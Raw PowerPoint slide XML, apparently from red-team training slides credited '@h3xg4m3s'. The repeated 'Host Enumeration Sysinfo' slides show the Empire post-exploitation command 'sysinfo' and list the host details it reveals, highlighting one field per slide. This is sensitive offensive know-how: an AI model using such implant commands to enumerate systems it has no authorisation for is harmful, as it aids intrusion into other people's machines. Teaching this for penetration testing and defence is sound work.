          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="117475"/>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42083068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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1652178"/>
            <a:ext cx="3688781" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Empire CMD:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>     :::INFO:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Domain\User</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Windows Version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Shell Integrity level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>PSH version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB2B04F6-2D7E-4DDA-8E43-B13143B0B3A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2797601" y="1512124"/>
            <a:ext cx="9394399" cy="4989087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D65BBC3-CE6E-4DB9-8BED-3E68435B3D34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4416994" y="1528823"/>
            <a:ext cx="3688781" cy="421451"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500"/>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4289268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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1652178"/>
            <a:ext cx="3688781" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Empire CMD:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>     :::INFO:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Domain\User</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Windows Version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Shell Integrity level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>PSH version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB2B04F6-2D7E-4DDA-8E43-B13143B0B3A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2797601" y="1500725"/>
            <a:ext cx="9394399" cy="4989087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08ECAF54-DD32-4A09-B1A1-7A8C416515F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5174159" y="2540824"/>
            <a:ext cx="3688781" cy="421451"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500"/>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4286161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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1652178"/>
            <a:ext cx="3688781" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Empire CMD:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>     :::INFO:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Domain\User</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Windows Version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Shell Integrity level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>PSH version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB2B04F6-2D7E-4DDA-8E43-B13143B0B3A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2797601" y="1500725"/>
            <a:ext cx="9394399" cy="4989087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08ECAF54-DD32-4A09-B1A1-7A8C416515F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5650409" y="3007549"/>
            <a:ext cx="3688781" cy="421451"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500"/>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6816975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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1652178"/>
            <a:ext cx="3688781" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Empire CMD:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>     :::INFO:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Domain\User</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows Version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Shell Integrity level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>PSH version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB2B04F6-2D7E-4DDA-8E43-B13143B0B3A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2797601" y="1500725"/>
            <a:ext cx="9394399" cy="4989087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{152B1704-B911-4AD3-916E-14E5CB547BB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095999" y="3795942"/>
            <a:ext cx="5419726" cy="421451"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500"/>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41155342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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1652178"/>
            <a:ext cx="3688781" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Empire CMD:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>     :::INFO:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Domain\User</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Windows Version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shell Integrity level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>PSH version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
